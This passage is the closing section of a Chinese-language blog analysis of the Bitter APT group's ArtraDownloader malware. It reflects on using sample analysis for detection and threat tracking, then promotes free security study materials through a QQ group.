跟蹤APT組織的手法演進。","attrs":{}}]},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"結語","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"蔓靈花的常用下載器ArtraDownloader分析到這裏就結束啦~","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"分析透一個經典的樣本後,就相當於掌握了一個類型的病毒,惡意功能和實現的代碼都是大同小異的。通過大量的分析和積累經驗《機器學習》理解原理後就可以更快的找到斷點和不同處。再將其特徵應用到檢測環境中,發現或追蹤APT組織的攻擊活動,甚至在大量的歷史攻擊手法演變數據下進行未來攻擊的預測(如","attrs":{}},{"type":"text","marks":[{"type":"strong","attrs":{}}],"text":"StrongPity","attrs":{}},{"type":"text","text":"(下期再見)),掌握先機拉取更多的惡意載荷,爲下一次極速響應爭取時間。","attrs":{}}]},{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"最後多說幾句:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"爲了感謝讀者們,我想把我收藏的一些網絡安全/滲透測試學習乾貨貢獻給大家,回饋每一個讀者,希望能幫到你們。","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"乾貨主要有:","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"① 2000多本網安必看電子書(主流和經典的書籍應該都有了)","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"② PHP標準庫資料(最全中文版)","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"③ 項目源碼(四五十個有趣且經典的練手項目及源碼)","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"④ 網絡安全基礎入門、Linux運維,web安全、滲透測試方面的視頻(適合小白學習)","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"⑤ 網絡安全學習路線圖(告別不入流的學習)","attrs":{}}]},{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"type":"text","text":"各位朋友們可以關注+評論一波 然後加下","attrs":{}},{"type":"text","marks":[{"type":"strong","attrs":{}}],"text":"QQ羣:581499282","attrs":{}},{"type":"text","text":" 備註:Infoq 即可免費獲取全部資料","attrs":{}}]}]}
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章
應用星探|別笑,這三款應用真的超“機智”!
前言 歡迎大家來到最新一期的應用星探系列,今天,我們就來盤點那些在AI原生應用中嶄露頭角的創意王者。如果對AI原生應用感興趣的朋友後續可以持續關注哦~ Ai technology
AppBuilder低代碼體驗:構建雅思大作文組件
Ai technology 前言 AppBuilder上線了低代碼製作組件功能,可以通過工作流的方式構建自定義組件,完成簡單Agent無法完成的複雜功能,使得生成的文本更加定製化,